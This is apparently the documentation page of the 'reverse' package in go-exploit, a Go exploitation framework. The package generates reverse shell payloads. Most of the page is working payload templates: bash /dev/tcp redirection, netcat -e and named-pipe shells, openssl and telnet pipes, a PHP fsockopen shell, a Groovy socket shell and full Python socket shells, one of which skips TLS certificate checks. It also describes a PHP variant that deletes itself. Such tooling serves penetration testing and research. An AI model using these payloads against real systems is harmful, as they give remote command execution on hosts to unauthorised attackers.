Documentation
¶
Overview ¶
Reverse shell and command payloads.
The reverse package contains all the code for reverse shell payloads. Each of these payload types can be used either in the raw string format for manipulation or via the specific payload type provided by the project.
This package is designed to be abstract enough to allow for multiple types of composition, but always with the fact that payloads are almost always string or byte oriented. With this in mind the payloads may be invoked with a constructed type or a direct string call.
For example, here are the 3 ways to create a netcat reverse shell payload that result in the same payload:
reverse.Netcat.Default("127.0.0.1", 1337)
reverse.Netcat.Mknod("127.0.0.1", 1337)
fmt.Sprintf(reverse.NetcatMknod, "127.0.0.1", 1337)
Each of the defined payload types should utilize a Default reverse shell constant that corresponds to the most common case.
Index ¶
- Constants
- Variables
- type BashPayload
- type Default
- type GJScriptPayload
- type GroovyPayload
- type JJSScriptPayload
- type JavaPayload
- type NetcatPayload
- type OpenSSLPayload
- type PHPPayload
- func (php *PHPPayload) Default(lhost string, lport int) string
- func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
- func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string
- func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string
- type PythonPayload
- type Reverse
- type TelnetPayload
Examples ¶
Constants ¶
const ( BashDefault = BashTCPRedirection BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'` )
const ( GJScriptDefault = GJScriptGLibSpawn GJScriptGLibSpawn = `` /* 528-byte string literal not displayed */ )
const ( GroovyDefault = GroovyClassic GroovyClassic = `shell='/bin/sh';if(System.getProperty('os.name').indexOf('Windows')!=-1)` + `shell='cmd.exe';Process p=new ProcessBuilder(shell).redirectErrorStream(true).start();` + `Socket s=new Socket('%s',%d);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),` + `si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();` + `while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)` + `so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();` + `Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();` )
const ( JavaDefault = JavaProcessBuilderInteractive JavaProcessBuilderInteractive = `` /* 670-byte string literal not displayed */ )
const ( NetcatDefault = NetcatGaping NetcatGaping = `nc %s %d -e /bin/sh` NetcatMknod = `cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;` )
const ( OpenSSLDefault = OpenSSLMknod OpenSSLMknod = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;` OpenSSLMkfifo = `cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;` )
const ( PHPDefault = PHPLinuxInteractive PHPLinuxInteractive = `<?php $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>` PHPUnflattened = `` /* 1604-byte string literal not displayed */ PHPUnflattenedSelfDelete = `` /* 1704-byte string literal not displayed */ )
const ( PythonDefault = Python27 Python27 = "import socket\n" + "import subprocess\n" + "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" + "s.connect(('%s', %d))\n" + "while 1:\n" + " data = s.recv(1024).decode('UTF-8')\n" + " if data == 'exit\\n':\n" + " break\n" + " if len(data) > 0:\n" + " proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n" + " s.send(proc.stdout.read() + proc.stderr.read())\n" + "s.close()\n" Python27Secure = "import socket\n" + "import subprocess\n" + "import ssl\n" + "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" + "s.connect(('%s', %d))\n" + "sslsock = ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)\n" + "while 1:\n" + " data = sslsock.recv(1024).decode('UTF-8')\n" + " if data == 'exit\\n':\n" + " break\n" + " if len(data) > 0:\n" + " proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n" + " sslsock.send(proc.stdout.read() + proc.stderr.read())\n" + "sslsock.close()\n" )
const ( TelnetDefault = TelnetMknod TelnetMknod = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s:%d > %s; rm %s;` TelnetMknodNoColon = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s %d > %s; rm %s;` TelnetMkfifo = `cd /tmp; mkfifo %s; telnet %s:%d 0<%s | sh 1>%s; rm %s;` TelnetMkfifoNoColon = `cd /tmp; mkfifo %s; telnet %s %d 0<%s | sh 1>%s; rm %s;` )
Variables ¶
var ( Bash = &BashPayload{} GJScript = &GJScriptPayload{} JJS = &JJSScriptPayload{} Java = &JavaPayload{} Netcat = &NetcatPayload{} OpenSSL = &OpenSSLPayload{} PHP = &PHPPayload{} Python = &PythonPayload{} Telnet = &TelnetPayload{} Groovy = &GroovyPayload{} )
Makes the Bash payloads accessible via `reverse.Bash`.
Functions ¶
This section is empty.
Types ¶
type BashPayload ¶
type BashPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*BashPayload) Default ¶
func (bash *BashPayload) Default(lhost string, lport int) string
The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.
Example ¶
package main
import (
"fmt"
"github.com/vulncheck-oss/go-exploit/payload/reverse"
)
func main() {
fmt.Println(reverse.Bash.Default("127.0.0.1", 1337))
}
Output: bash -c 'bash &> /dev/tcp/127.0.0.1/1337 <&1'
func (*BashPayload) TCPRedirection ¶
func (bash *BashPayload) TCPRedirection(lhost string, lport int) string
Utilizes the bash networking pseudo `/dev/tcp/` functionality to create a reverse bash shell.
type GJScriptPayload ¶
type GJScriptPayload struct{}
Defines the default Bash struct and all associated payload functions.
type GroovyPayload ¶ added in v1.16.0
type GroovyPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*GroovyPayload) Default ¶ added in v1.16.0
func (groovy *GroovyPayload) Default(lhost string, lport int) string
func (*GroovyPayload) GroovyClassic ¶ added in v1.16.0
func (groovy *GroovyPayload) GroovyClassic(lhost string, lport int) string
A short payload that creates a reverse shell using /bin/sh -i.
type JJSScriptPayload ¶
type JJSScriptPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*JJSScriptPayload) Default ¶
func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string
Generates a script that can be used to create a reverse shell via jjs (Java javascript). This is an adapted version of Frohoff's OG gist. Additionally, the disabling of TLS validation logic was adapted from a blog written by Callan Howell-Pavia.
The script will autodetect if the platform is Windows and provide a 'cmd.exe' shell. Otherwise bash is used.
https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/ https://gist.github.com/frohoff/8e7c2bf3737032a25051
type JavaPayload ¶
type JavaPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*JavaPayload) Default ¶
func (java *JavaPayload) Default(lhost string, lport int) string
Defaults to the UnflattenedJava payload.
func (*JavaPayload) UnflattenedJava ¶
func (java *JavaPayload) UnflattenedJava(lhost string, lport int) string
An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out the shell using ProcessBuilder and then redirects input/output to/from the sockets.
type NetcatPayload ¶
type NetcatPayload struct{}
Defines the default Bash struct and all associated payload functions.
type OpenSSLPayload ¶
type OpenSSLPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*OpenSSLPayload) Default ¶
func (openssl *OpenSSLPayload) Default(lhost string, lport int) string
type PHPPayload ¶
type PHPPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*PHPPayload) LinuxInteractive ¶
func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
A short payload that creates a reverse shell using /bin/sh -i.
func (*PHPPayload) Unflattened ¶
func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string
Creates an encrypted reverse shell using PHP. The payload autodetects the operating system and will selected cmd.exe or /bin/sh accordingly.. The user also specifies if the reverse shell should be encrypted or not.
reverse.PHP.Unflattened("10.9.49.80", 1270, true).
func (*PHPPayload) UnflattenedSelfDelete ¶ added in v1.33.0
func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string
Creates an encrypted reverse shell using PHP, same as Unflattened, but attempts to self-delete and sets up destructors to delete file on disk when command exits.
type PythonPayload ¶
type PythonPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*PythonPayload) Python27 ¶
func (py *PythonPayload) Python27(lhost string, lport int) string
An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux.
func (*PythonPayload) SecurePython27 ¶
func (py *PythonPayload) SecurePython27(lhost string, lport int) string
An unflattened reverse shell that uses an SSL socket, works on Python 2.7, 3+, Windows and Linux.
type Reverse ¶
type Reverse interface {
Default
}
Defines the Default function to be created for each type of payload.
type TelnetPayload ¶
type TelnetPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*TelnetPayload) Default ¶
func (telnet *TelnetPayload) Default(lhost string, lport int, colon bool) string
Source Files